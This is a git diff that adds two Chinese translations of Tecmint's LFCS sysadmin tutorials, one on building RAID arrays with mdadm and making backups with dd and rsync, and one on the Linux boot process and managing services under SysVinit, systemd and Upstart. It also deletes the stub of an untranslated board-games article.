diff --git a/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md b/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md
new file mode 100644
index 0000000000..ff480868ac
--- /dev/null
+++ b/published/LFCS/Part 6 - LFCS--Assembling Partitions as RAID Devices – Creating & Managing System Backups.md
@@ -0,0 +1,283 @@
+LFCS 系列第六讲:组装分区为 RAID 设备——创建和管理系统备份
+=========================================================
+Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中级系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时向上游团队请求支持的决策能力。
+
+![Linux Foundation Certified Sysadmin – Part 6](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-6.png)
+
+*LFCS 系列第六讲*
+
+以下视频介绍了 Linux 基金会认证程序。
+
+注:youtube 视频
+
+
+本讲是系列教程中的第六讲,在这一讲里,我们将会解释如何将分区组装为 RAID 设备——创建和管理系统备份。这些都是 LFCS 认证中的必备知识。
+
+### 了解 RAID ###
+
+这种被称为独立磁盘冗余阵列(Redundant Array of Independent Disks)(RAID)的技术是将多个硬盘组合成一个单独逻辑单元的存储解决方案,它提供了数据冗余功能并且改善硬盘的读写操作性能。
+
+然而,实际的容错能力和磁盘 I/O 性能取决于如何将多个硬盘组装成磁盘阵列。根据可用的设备和容错/性能的需求,RAID 被分为不同的级别,你可以参考 RAID 系列文章以获得每个 RAID 级别更详细的解释。
+
+- [在 Linux 下使用 RAID(一):介绍 RAID 的级别和概念][1]
+
+我们选择用于创建、组装、管理、监视软件 RAID 的工具,叫做 mdadm (multiple disk admin 的简写)。
+
+```
+---------------- Debian 及衍生版 ----------------
+# aptitude update && aptitude install mdadm
+```
+
+```
+---------------- Red Hat 和基于 CentOS 的系统 ----------------
+# yum update && yum install mdadm
+```
+
+```
+---------------- openSUSE 上 ----------------
+# zypper refresh && zypper install mdadm
+```
+
+#### 将分区组装成 RAID 设备 ####
+
+组装已有分区作为 RAID 设备的过程由以下步骤组成。
+
+**1. 使用 mdadm 创建阵列**
+
+如果其中某个分区之前已被格式化,或者曾是另一个 RAID 阵列的一部分,你会收到提示,要求确认创建新阵列。假设你已经采取了必要的预防措施以避免丢失重要数据,那么可以安全地输入 Y 并且按下回车。
+
+```
+# mdadm --create --verbose /dev/md0 --level=stripe --raid-devices=2 /dev/sdb1 /dev/sdc1
+```
+
+![Creating RAID Array](http://www.tecmint.com/wp-content/uploads/2014/10/Creating-RAID-Array.png)
+
+*创建 RAID 阵列*
+
+**2. 检查阵列的创建状态**
+
+在创建了 RAID 阵列之后,你可以使用以下命令检查阵列的状态。
+
+
+ # cat /proc/mdstat
+ 或者
+ # mdadm --detail /dev/md0 [More detailed summary]
+
+![Check RAID Array Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-RAID-Array-Status.png)
+
+*检查 RAID 阵列的状态*
+
+**3. 格式化 RAID 设备**
+
+如本系列[第四讲][2]所介绍的,按照你的需求/要求采用某种文件系统格式化你的设备。
+
+**4. 监控 RAID 阵列服务**
+
+让监控服务时刻监视你的 RAID 阵列。把 `# mdadm --detail --scan` 命令的输出结果添加到 `/etc/mdadm/mdadm.conf`(Debian 及其衍生版)或者 `/etc/mdadm.conf`(CentOS/openSUSE)中,如下。
+
+ # mdadm --detail --scan
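+
+例如,可以用追加重定向把扫描结果直接写入配置文件(这只是一种简单的写法,以 Debian 及其衍生版的配置文件路径为例):
+
+ # mdadm --detail --scan >> /etc/mdadm/mdadm.conf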
+
+
+![Monitor RAID Array](http://www.tecmint.com/wp-content/uploads/2014/10/Monitor-RAID-Array.png)
+
+*监控 RAID 阵列*
+
+ # mdadm --assemble --scan [Assemble the array]
+
+为了确保服务能够开机启动,需要以 root 权限运行以下命令。
+
+**Debian 及其衍生版**
+
+Debian 及其衍生版能够通过下面步骤使服务默认开机启动:
+
+ # update-rc.d mdadm defaults
+
+在 `/etc/default/mdadm` 文件中添加下面这一行
+
+ AUTOSTART=true
+
+
+**CentOS 和 openSUSE(基于 systemd)**
+
+ # systemctl start mdmonitor
+ # systemctl enable mdmonitor
+
+**CentOS 和 openSUSE(基于 SysVinit)**
+
+ # service mdmonitor start
+ # chkconfig mdmonitor on
+
+**5. 检查 RAID 磁盘故障**
+
+在支持冗余的 RAID 级别中,故障的驱动器在需要时会被替换。当磁盘阵列中的设备出现故障时,只有存在我们第一次创建阵列时预留的备用设备,阵列才会自动启动重建。
+
+![Check RAID Faulty Disk](http://www.tecmint.com/wp-content/uploads/2014/10/Check-RAID-Faulty-Disk.png)
+
+*检查 RAID 故障磁盘*
+
+否则,我们需要手动将一个额外的物理驱动器插入到我们的系统,并且运行:
+
+ # mdadm /dev/md0 --add /dev/sdX1
+
+/dev/md0 是出现了问题的阵列,而 /dev/sdX1 是新添加的设备。
+
+**6. 拆解一个工作阵列**
+
+如果你需要使用工作阵列的设备创建一个新的阵列,你可能不得不去拆解已有工作阵列——(可选步骤)
+
+ # mdadm --stop /dev/md0 # Stop the array
+ # mdadm --remove /dev/md0 # Remove the RAID device
+ # mdadm --zero-superblock /dev/sdX1 # Overwrite the existing md superblock with zeroes
+
+**7. 设置邮件通知**
+
+你可以配置一个用于发送通知的有效邮件地址或者系统账号(确保在 mdadm.conf 文件中有下面这一行)。——(可选步骤)
+
+ MAILADDR root
+
+在这种情况下,来自 RAID 后台监控程序所有的通知将会发送到你的本地 root 账号的邮件箱中。其中一个类似的通知如下。
+
+说明:此次通知事件和第5步中的例子相关。此处一个设备被标志为错误,并且一个空闲的设备自动地被 mdadm 加入到阵列。我们用完了所有“健康的”空闲设备,因此我们得到了通知。
+
+![RAID Monitoring Alerts](http://www.tecmint.com/wp-content/uploads/2014/10/RAID-Monitoring-Alerts.png)
+
+*RAID 监控通知*
+
+#### 了解 RAID 级别 ####
+
+**RAID 0**
+
+阵列总大小是最小分区大小的 n 倍,n 是阵列中独立磁盘的个数(你至少需要两个驱动器/磁盘)。运行下面命令,使用 /dev/sdb1 和 /dev/sdc1 分区组装一个 RAID 0 阵列。
+
+ # mdadm --create --verbose /dev/md0 --level=stripe --raid-devices=2 /dev/sdb1 /dev/sdc1
+
+常见用途:用于支持性能比容错更重要的实时应用程序的设置
+
+**RAID 1 (又名镜像)**
+
+阵列总大小等于最小分区大小(你至少需要两个驱动器/磁盘)。运行下面命令,使用 /dev/sdb1 和 /dev/sdc1 分区组装一个 RAID 1 阵列。
+
+ # mdadm --create --verbose /dev/md0 --level=1 --raid-devices=2 /dev/sdb1 /dev/sdc1
+
+常见用途:操作系统的安装或者重要的子文件夹,例如 /home
+
+**RAID 5 (又名奇偶校验码盘)**
+
+阵列总大小将是最小分区大小的 (n-1) 倍。所减少的大小用于奇偶校验(冗余)计算(你至少需要3个驱动器/磁盘)。
+
+说明:你可以指定一个空闲设备 (/dev/sde1) 替换问题出现时的故障部分(分区)。运行下面命令,使用 /dev/sdb1, /dev/sdc1, /dev/sdd1,/dev/sde1 组装一个 RAID 5 阵列,其中 /dev/sde1 作为空闲分区。
+
+ # mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1 --spare-devices=1 /dev/sde1
+
+常见用途:Web 和文件服务
+
+**RAID 6 (又名双重奇偶校验码盘)**
+
+阵列总大小为 (n*s) - 2*s,其中 n 为阵列中独立磁盘的个数,s 为最小磁盘大小。
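+
+例如(假设阵列由 4 块磁盘组成,最小磁盘为 1TB):总大小为 (4×1TB) - 2×1TB = 2TB,其余空间用于存放双重奇偶校验数据。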
+
+说明:你可以指定一个空闲分区(在这个例子为 /dev/sdf1)替换问题出现时的故障部分(分区)。
+
+运行下面命令,使用 /dev/sdb1, /dev/sdc1, /dev/sdd1, /dev/sde1 和 /dev/sdf1 组装 RAID 6 阵列,其中 /dev/sdf1 作为空闲分区。
+
+ # mdadm --create --verbose /dev/md0 --level=6 --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1 --spare-devices=1 /dev/sdf1
+
+常见用途:大容量、高可用性要求的文件服务器和备份服务器。
+
+**RAID 1+0 (又名镜像条带)**
+
+因为 RAID 1+0 是 RAID 0 和 RAID 1 的组合,所以阵列总大小是基于两者的公式计算的。首先,计算每一个镜像的大小,然后再计算条带的大小。
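+
+例如(假设使用 4 块 1TB 磁盘):先组成两个各为 1TB 的镜像对,再将这两个镜像条带化,阵列总大小约为 2TB。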
+
+ # mdadm --create --verbose /dev/md0 --level=10 --raid-devices=4 /dev/sd[b-e]1 --spare-devices=1 /dev/sdf1
+
+常见用途:需要快速 IO 操作的数据库和应用服务器
+
+#### 创建和管理系统备份 ####
+
+记住,无论 RAID 有多少优点,它都不能替代备份!如果有必要,就把这句话在黑板上写上 1000 遍,但无论何时都一定要记住它。在我们开始前,我们必须注意的是,没有一个放之四海皆准的针对所有系统备份的解决方案,但这里有一些东西,是你在规划一个备份策略时需要考虑的。
+
+- 你的系统将用于什么?(桌面或者服务器?如果系统是应用于后者,那么最重要的服务是什么?哪个配置是痛点?)
+- 你每隔多久备份你的系统?
+- 你需要备份的数据是什么(比如文件/文件夹/数据库转储)?你还可以考虑是否需要备份大型文件(比如音频和视频文件)。
+- 这些备份将会存储在哪里(物理位置和存储介质)?
+
+**备份你的数据**
+
+方法1:使用 dd 命令备份整个磁盘。你可以在任意时间点通过创建一个准确的镜像来备份一整个硬盘或者是分区。注意当设备是离线时,这种方法效果最好,也就是说它没有被挂载并且没有任何进程的 I/O 操作访问它。
+
+这种备份方法的缺点是镜像将具有和磁盘或分区一样的大小,即使实际数据占用的是一个很小的比例。比如,如果你想要为只使用了10%的20GB的分区创建镜像,那么镜像文件将仍旧是20GB。换句话来讲,它不仅包含了备份的实际数据,而且也包含了整个分区。如果你想完整备份你的设备,那么你可以考虑使用这个方法。
+
+**从现有的设备创建一个镜像文件**
+
+ # dd if=/dev/sda of=/system_images/sda.img
+ 或者
+ --------------------- 可选地,你可以压缩镜像文件 -------------------
+ # dd if=/dev/sda | gzip -c > /system_images/sda.img.gz
+
+**从镜像文件恢复备份**
+
+ # dd if=/system_images/sda.img of=/dev/sda
+ 或者
+ --------------------- 根据你创建镜像文件时的选择(译者注:比如压缩) ----------------
+ # gzip -dc /system_images/sda.img.gz | dd of=/dev/sda
+
+方法2:使用 tar 命令备份指定的文件/文件夹——这已经在本系列[第三讲][3]中讲过了。如果你想要备份指定的文件/文件夹(配置文件,用户主目录等等),你可以使用这种方法。
+
+方法3:使用 rsync 命令同步文件。rsync 是一种多功能远程(和本地)文件复制工具。如果你想要从网络设备备份或同步文件,rsync 是一种选择。
+
+
+无论你是在同步两个本地文件夹,还是在本地文件夹与挂载在本地文件系统上的远程文件夹之间同步,其基本语法都是一样的。
+
+ # rsync -av source_directory destination_directory
+
+在这里,-a 递归遍历子目录(如果它们存在的话),维持符号链接、时间戳、权限以及原本的属主/属组,-v 显示详细过程。
+
+![rsync Synchronizing Files](http://www.tecmint.com/wp-content/uploads/2014/10/rsync-synchronizing-Files.png)
+
+*rsync 同步文件*
+
+除此之外,如果你想增加在网络上传输数据的安全性,你可以通过 ssh 协议使用 rsync。
+
+**通过 ssh 同步本地到远程文件夹**
+
+ # rsync -avzhe ssh backups root@remote_host:/remote_directory/
+
+这个示例,本地主机上的 backups 文件夹将与远程主机上的 /remote_directory 的内容同步。
+
+在这里,-h 选项以易读的格式显示文件的大小,-e 标志用于表示一个 ssh 连接。
+
+![rsync Synchronize Remote Files](http://www.tecmint.com/wp-content/uploads/2014/10/rsync-synchronize-Remote-Files.png)
+
+*rsync 同步远程文件*
+
+**通过 ssh 同步远程到本地文件夹**
+
+在这种情况下,交换前面示例中的 source 和 destination 文件夹。
+
+ # rsync -avzhe ssh root@remote_host:/remote_directory/ backups
+
+请注意这些只是 rsync 用法的三个示例而已(你可能遇到的最常见的情形)。对于更多有关 rsync 命令的示例和用法,你可以查看下面的文章。
+
+- [在 Linux 下同步文件的10个 rsync命令][4]
+
+### 总结 ###
+
+作为一个系统管理员,你需要确保你的系统表现得尽可能好。如果你做好了充分准备,并且你的数据完整性有诸如 RAID 和日常系统备份这样的存储技术作保障,那你就是安全的。
+
+如果你有有关完善这篇文章的问题、评论或者进一步的想法,可以在下面畅所欲言。除此之外,请考虑通过你的社交网络简介分享这系列文章。
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/creating-and-managing-raid-backups-in-linux/
+
+作者:[Gabriel Cánepa][a]
+译者:[cpsoture](https://github.com/cposture)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.tecmint.com/author/gacanepa/
+[1]:https://linux.cn/article-6085-1.html
+[2]:https://linux.cn/article-7187-1.html
+[3]:https://linux.cn/article-7171-1.html
+[4]:http://www.tecmint.com/rsync-local-remote-file-synchronization-commands/
+
diff --git a/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md b/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
new file mode 100644
index 0000000000..ff987c3e9b
--- /dev/null
+++ b/published/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
@@ -0,0 +1,341 @@
+LFCS 系列第七讲:通过 SysVinit、Systemd 和 Upstart 管理系统自启动进程和服务
+================================================================================
+几个月前, Linux 基金会宣布 LFCS (Linux 基金会认证系统管理员) 认证诞生了,这个令人兴奋的新计划定位于让来自全球各地的初级到中级的 Linux 系统管理员得到认证。这其中包括维护已经在运行的系统和服务的能力、第一手的问题查找和分析能力、以及决定何时向开发团队提交问题的能力。
+
+![Linux Foundation Certified Sysadmin – Part 7](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-7.png)
+
+*第七讲: Linux 基金会认证系统管理员*
+
+下面的视频简要介绍了 Linux 基金会认证计划。
+
+注:youtube 视频
+
+
+本讲是系列教程中的第七讲,在这篇文章中,我们会介绍如何管理 Linux 系统自启动进程和服务,这是 LFCS 认证考试要求的一部分。
+
+### 管理 Linux 自启动进程 ###
+
+Linux 系统的启动程序包括多个阶段,每个阶段由一个不同的图示块表示。下面的图示简要总结了启动过程以及所有包括的主要组件。
+
+![Linux Boot Process](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-Boot-Process.png)
+
+*Linux 启动过程*
+
+当你按下你机器上的电源键时,存储在主板 EEPROM 芯片中的固件会启动 POST(通电自检)来检查系统硬件资源的状态。POST 结束后,固件会搜索并加载位于第一块可用磁盘上的 MBR 或 EFI 分区的第一阶段引导程序,并把控制权交给引导程序。
+
+#### MBR 方式 ####
+
+MBR 位于 BIOS 设置中标记为可启动的磁盘的第一个扇区,大小是 512 个字节。
+
+- 前面 446 个字节:包括可执行代码和错误信息文本的引导程序
+- 接下来的 64 个字节:分区表,四个分区(主分区或扩展分区)中每个分区占一条记录。其中,每条记录标示了每一个分区的状态(是否活跃)、大小以及开始和结束扇区。
+- 最后 2 个字节: MBR 有效性检查的魔法数。
+
+下面的命令对 MBR 进行备份(在本例中,/dev/sda 是第一块硬盘)。结果文件 mbr.bkp 在分区表被破坏(例如系统不可引导)时能派上用场。
+
+当然,为了后面需要的时候能使用它,我们需要把它保存到别的地方(例如一个 USB 设备)。该文件能帮助我们重新恢复 MBR,这只在我们操作过程中没有改变硬盘驱动布局时才有效。
+
+**备份 MBR**
+
+ # dd if=/dev/sda of=mbr.bkp bs=512 count=1
+
+![Backup MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Backup-MBR-in-Linux.png)
+
+*在 Linux 中备份 MBR*
+
+**恢复 MBR**
+
+ # dd if=mbr.bkp of=/dev/sda bs=512 count=1
+
+![Restore MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-MBR-in-Linux.png)
+
+*在 Linux 中恢复 MBR*
+
+#### EFI/UEFI 方式 ####
+
+对于使用 EFI/UEFI 方式的系统,UEFI 固件读取它的设置来决定从哪里启动哪个 UEFI 应用(例如,EFI 分区位于哪块磁盘或分区)。
+
+接下来,加载并运行第二阶段引导程序(又名引导管理器)。GRUB(GRand Unified Bootloader)是 Linux 中最常使用的引导管理器。如今使用的大部分系统中都能找到它两个版本中的一个。
+
+- GRUB 有效配置文件: /boot/grub/menu.lst(旧发行版, EFI/UEFI 固件不支持)。
+- GRUB2 配置文件: 通常是 /etc/default/grub。
+
+尽管 LFCS 考试目标没有明确要求了解 GRUB 内部知识,但如果你足够大胆并且不怕把你的系统搞乱(为了以防万一,你可以先在虚拟机上进行尝试)你可以运行:
+
+ # update-grub
+
+在修改 GRUB 的配置之后,你需要以 root 身份运行该命令,使更改生效。
+
+首先, GRUB 加载默认的内核以及 initrd 或 initramfs 镜像。补充一句,initrd 或者 initramfs 帮助完成硬件检测、内核模块加载、以及发现挂载根目录文件系统需要的设备。
+
+一旦真正的根文件系统挂载完毕,内核就会执行系统和服务管理器(init 或 systemd,其进程号 PID 一般为 1),以开始普通用户态的引导过程,从而最终显示出用户界面。
+
+init 和 systemd 都是管理其它守护进程的守护进程(后台进程),它们总是最先启动(系统引导时),最后结束(系统关闭时)。
+
+![Systemd and Init](http://www.tecmint.com/wp-content/uploads/2014/10/systemd-and-init.png)
+
+*Systemd 和 Init*
+
+### 自启动服务(SysVinit) ###
+
+Linux 中的运行等级通过控制运行哪些服务,提供了以不同方式使用系统的能力。换句话说,运行等级控制着当前执行状态下可以完成什么任务(以及什么不能完成)。
+
+传统上,这个启动过程是基于起源于 System V Unix 的形式,通过执行脚本启动或者停止服务从而使机器进入指定的运行等级(换句话说,是一个不同的系统运行模式)。
+
+在每个运行等级中,独立服务可以设置为运行、或者在运行时关闭。一些主流发行版的最新版本中,已经移除了标准的 System V,而用一个称为 systemd(表示系统守护进程)的新服务和系统管理器代替,但为了兼容性,通常也支持 sysv 命令。这意味着你可以在基于 systemd 的发行版中运行大部分有名的 sysv 初始化工具。
+
+- 推荐阅读: [Linux 为什么用 ‘systemd’ 代替 ‘init’][1]
+
+除了启动系统进程,init 还会查看 /etc/inittab 来决定进入哪个运行等级。
+
+
+|运行等级|描述|
+|--------|------------|
+|0|停止系统。运行等级 0 是一个用于快速关闭系统的特殊过渡状态。|
+|1|别名为 s 或 S,这个运行等级有时候也称为维护模式。在这个运行等级启动的服务由于发行版不同而不同。通常用于正常系统操作损坏时低级别的系统维护。|
+|2|多用户。在 Debian 系统及其衍生版中,这是默认的运行等级,还包括了一个图形化登录(如果有的话)。在基于红帽的系统中,这是没有网络的多用户模式。|
+|3|在基于红帽的系统中,这是默认的多用户模式,运行除了图形化环境以外的所有东西。基于 Debian 的系统中通常不会使用这个运行等级以及等级 4 和 5。|
+|4|通常默认情况下不使用,可用于自定制。|
+|5|基于红帽的系统中,支持 GUI 登录的完全多用户模式。这个运行等级和等级 3 类似,但是有可用的 GUI 登录。|
+|6|重启系统。|
+
+
+要在运行等级之间切换,我们只需要使用 init 命令更改运行等级:init N(其中 N 是上面列出的一个运行等级)。
+请注意这并不是在运行中的系统上切换运行等级的推荐方式,因为它不会给已经登录的用户发送警告(因而会导致他们丢失工作、进程异常终止)。
+
+相反,应该用 shutdown 命令重启系统(它首先发送警告信息给所有已经登录的用户,并锁住任何新的登录;然后再给 init 发送信号切换运行等级)。但是,首先要在 /etc/inittab 文件中设置好默认的运行等级(系统引导到的等级)。
+
+因为这个原因,请按照下面的步骤恰当地切换运行等级。以 root 用户在 /etc/inittab 中查找下面的行。
+
+ id:2:initdefault:
+
+并用你喜欢的文本编辑器,例如 vim(本系列的 [LFCS 系列第二讲:如何安装和使用纯文本编辑器 vi/vim][2]),更改数字 2 为想要的运行等级。
+
+然后,以 root 用户执行
+
+ # shutdown -r now
+
+最后一个命令会重启系统,并使它在下一次引导时进入指定的运行等级,并会执行保存在 /etc/rc[runlevel].d 目录中的脚本以决定应该启动什么服务、不应该启动什么服务。例如,下面的系统运行在运行等级 2。
+
+![Change Runlevels in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Runlevels-in-Linux.jpeg)
+
+*在 Linux 中更改运行等级*
+
+#### 使用 chkconfig 管理服务 ####
+
+为了在启动时启动或者停用系统服务,我们可以在 CentOS / openSUSE 中使用 [chkconfig 命令][3],在 Debian 及其衍生版中使用 sysv-rc-conf 命令。这个工具还能告诉我们对于一个指定的运行等级预先配置的状态是什么。
+
+- 推荐阅读: [如何在 Linux 中停止和停用不想要的服务][4]
+
+列出某个服务的运行等级配置。
+
+ # chkconfig --list [service name]
+ # chkconfig --list postfix
+ # chkconfig --list mysqld
+
+![Listing Runlevel Configuration](http://www.tecmint.com/wp-content/uploads/2014/10/Listing-Runlevel-Configuration.png)
+
+*列出运行等级配置*
+
+从上图中我们可以看出,当系统进入运行等级 2 到 5 的时候就会启动 postfix,而默认情况下运行等级 2 到 4 时会运行 mysqld。现在假设我们并不希望如此。
+
+例如,我们希望运行等级为 5 时也启动 mysqld,运行等级为 4 或 5 时关闭 postfix。下面分别针对两种情况进行设置(以 root 用户执行以下命令)。
+
+**为特定运行等级启用服务**
+
+ # chkconfig --level [level(s)] service on
+ # chkconfig --level 5 mysqld on
+
+**为特定运行等级停用服务**
+
+ # chkconfig --level [level(s)] service off
+ # chkconfig --level 45 postfix off
+
+![Enable Disable Services in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Disable-Services.png)
+
+*启用/停用服务*
+
+我们在基于 Debian 的系统中使用 sysv-rc-conf 完成类似任务。
+
+#### 使用 sysv-rc-conf 管理服务 ####
+
+将服务配置为在指定运行等级自动启动,同时禁止它在其它运行等级启动。
+
+1. 我们可以用下面的命令查看启动 mdadm 时的运行等级。
+
+ # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
+
+
+ ![Check Runlevel of Service Running](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Runlevel.png)
+
+ *查看运行中服务的运行等级*
+
+2. 我们使用 sysv-rc-conf 设置防止 mdadm 在运行等级2 之外的其它等级启动。只需根据需要(你可以使用上下左右按键)选中或取消选中(通过空格键)。
+
+ # sysv-rc-conf
+
+ ![SysV Runlevel Config](http://www.tecmint.com/wp-content/uploads/2014/10/SysV-Runlevel-Config.png)
+
+ *Sysv 运行等级配置*
+
+ 然后输入 q 退出。
+
+3. 重启系统并从步骤 1 开始再操作一遍。
+
+ # ls -l /etc/rc[0-6].d | grep -E 'rc[0-6]|mdadm'
+
+ ![Verify Service Runlevel](http://www.tecmint.com/wp-content/uploads/2014/10/Verify-Service-Runlevel.png)
+
+ *验证服务运行等级*
+
+ 从上图中我们可以看出 mdadm 配置为只在运行等级 2 上启动。
+
+### 那关于 systemd 呢? ###
+
+systemd 是另外一个被多种主流 Linux 发行版采用的服务和系统管理器。它的目标是允许系统启动时多个任务尽可能并行(而 sysvinit 并非如此,sysvinit 一般比较慢,因为它每次只启动一个进程,而且会检查彼此之间是否有依赖,在启动其它服务之前还要等待守护进程启动),充当运行中系统动态资源管理的角色。
+
+因此,服务只在需要的时候启动,而不是系统启动时毫无缘由地启动(为了防止消耗系统资源)。
+
+要查看你系统中运行的原生 systemd 服务和 Sysv 服务,可以用以下的命令。
+
+ # systemctl
+
+![Check All Running Processes in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-All-Running-Processes.png)
+
+*查看运行中的进程*
+
+LOAD 一列显示了单元(UNIT 列,显示服务或者由 systemd 维护的其它进程)是否正确加载,ACTIVE 和 SUB 列则显示了该单元当前的状态。
+
+**显示服务当前状态的信息**
+
+当 ACTIVE 列显示某个单元状态并非活跃时,我们可以使用以下命令查看具体原因。
+
+ # systemctl status [unit]
+
+例如,上图中 media-samba.mount 处于失败状态。我们可以运行:
+
+ # systemctl status media-samba.mount
+
+![Check Linux Service Status](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Service-Status.png)
+
+*查看服务状态*
+
+我们可以看到 media-samba.mount 失败的原因是 host dev1 上的挂载进程无法找到 //192.168.0.10/gacanepa 上的共享网络。
+
+### 启动或停止服务 ###
+
+一旦 //192.168.0.10/gacanepa 上的共享网络可用,我们可以再来尝试启动、停止以及重启 media-samba.mount 单元。执行每次操作之后,我们都执行 systemctl status media-samba.mount 来查看它的状态。
+
+ # systemctl start media-samba.mount
+ # systemctl status media-samba.mount
+ # systemctl stop media-samba.mount
+ # systemctl restart media-samba.mount
+ # systemctl status media-samba.mount
+
+![启动停止服务](http://www.tecmint.com/wp-content/uploads/2014/10/Starting-Stoping-Service.jpeg)
+
+*启动停止服务*
+
+**启用或停用某服务随系统启动**
+
+使用 systemd,你可以在系统启动时启用或停用某服务。
+
+ # systemctl enable [service] # 启用服务
+ # systemctl disable [service] # 阻止服务随系统启动
+
+
+启用或停用某服务随系统启动,实际上就是在 /etc/systemd/system/multi-user.target.wants 目录中添加或者删除相应的符号链接。
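+
+例如,可以列出该目录来查看某个服务(这里以 postfix 为例,仅作演示)的符号链接是否存在:
+
+ # ls -l /etc/systemd/system/multi-user.target.wants/ | grep postfix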
+
+![启用或停用服务](http://www.tecmint.com/wp-content/uploads/2014/10/Enabling-Disabling-Services.jpeg)
+
+*启用或停用服务*
+
+你也可以用下面的命令查看某个服务的当前状态(启用或者停用)。
+
+ # systemctl is-enabled [service]
+
+例如,
+
+ # systemctl is-enabled postfix.service
+
+另外,你可以用下面的命令重启或者关闭系统。
+
+ # systemctl reboot
+ # systemctl shutdown
+
+### Upstart ###
+
+基于事件的 Upstart 是 /sbin/init 守护进程的替代品,它只在需要服务的时候才启动服务(并在服务运行时对其进行管理),还能处理所发生的事件,因此 Upstart 优于基于依赖的 sysvinit 系统。
+
+一开始它是为 Ubuntu 发行版开发的,但在红帽企业版 Linux 6.0 中得到使用。尽管希望它能在所有 Linux 发行版中替代 sysvinit,但它已经被 systemd 超越。2014 年 2 月 14 日,Mark Shuttleworth(Canonical Ltd. 创建者)发布声明之后的 Ubuntu 发行版采用 systemd 作为默认初始化守护进程。
+
+由于 Sysv 启动脚本已经流行很长时间了,很多软件包中都包括了 Sysv 启动脚本。为了兼容这些软件,Upstart 提供了兼容模式:它可以运行保存在常用位置(/etc/rc.d/rc?.d、/etc/init.d/rc?.d、/etc/rc?.d 或其它类似的位置)的 Sysv 启动脚本。因此,如果我们安装了一个还没有 Upstart 配置脚本的软件,仍然可以用原来的方式启动它。
+
+另外,如果我们还安装了类似 [chkconfig][5] 的工具,你还可以和在基于 sysvinit 的系统中一样用它们管理基于 Sysv 的服务。
+
+Upstart 脚本除了支持 Sysv 启动脚本,还支持基于多种方式启动或者停用服务;例如, Upstart 可以在一个特定硬件设备连接上的时候启动一个服务。
+
+只使用 Upstart 及其原生脚本的系统,用 /etc/init 目录下以 .conf 为后缀的脚本替换了 /etc/inittab 文件和与运行等级相关的 Sysv 启动脚本目录。
+
+这些 *.conf 脚本(也称为任务定义)通常包括以下几部分:
+
+- 进程描述
+- 进程的运行等级或者应该触发它们的事件
+- 应该停止进程的运行等级或者触发停止进程的事件
+- 选项
+- 启动进程的命令
+
+例如,
+
+ # My test service - Upstart script demo
+ description "Here goes the description of 'My test service'"
+ author "Dave Null"
+ # Stanzas
+
+ #
+ # Stanzas define when and how a process is started and stopped
+ # See a list of stanzas here: http://upstart.ubuntu.com/wiki/Stanzas#respawn
+ # When to start the service
+ start on runlevel [2345]
+ # When to stop the service
+ stop on runlevel [016]
+ # Automatically restart process in case of crash
+ respawn
+ # Specify working directory
+ chdir /home/dave/myfiles
+ # Specify the process/command (add arguments if needed) to run
+ exec bash backup.sh arg1 arg2
+
+要使更改生效,你要让 upstart 重新加载它的配置文件。
+
+ # initctl reload-configuration
+
+然后用下面的命令启动你的任务。
+
+ $ sudo start yourjobname
+
+其中 yourjobname 是之前 yourjobname.conf 脚本中添加的任务名称。
+
+关于 Upstart 更完整和详细的介绍可以参考该项目网站的 “[Cookbook][6]” 栏目。
+
+### 总结 ###
+
+了解 Linux 启动进程对于你进行错误处理、调整计算机系统以及根据需要运行服务非常有用。
+
+在这篇文章中,我们分析了你按下电源键启动机器的一刻到你看到完整的可操作用户界面这段时间发生了什么。我希望你能像我一样把它们放在一起阅读。欢迎在下面留下你的评论或者疑问。我们总是期待听到读者的回复。
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/linux-boot-process-and-manage-services/
+
+作者:[Gabriel Cánepa][a]
+译者:[ictlyh](http://mutouxiaogui.cn/blog/)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.tecmint.com/author/gacanepa/
+[1]:http://www.tecmint.com/systemd-replaces-init-in-linux/
+[2]:https://linux.cn/article-7165-1.html
+[3]:http://www.tecmint.com/chkconfig-command-examples/
+[4]:http://www.tecmint.com/remove-unwanted-services-from-linux/
+[5]:http://www.tecmint.com/chkconfig-command-examples/
+[6]:http://upstart.ubuntu.com/cookbook/
diff --git a/sources/share/20150901 5 best open source board games to play online.md b/sources/share/20150901 5 best open source board games to play online.md
deleted file mode 100644
index eee49289e0..0000000000
--- a/sources/share/20150901 5 best open source board games to play online.md
+++ /dev/null
@@ -1,195 +0,0 @@
-translating by tastynoodle
-5 best open source board games to play online
-================================================================================
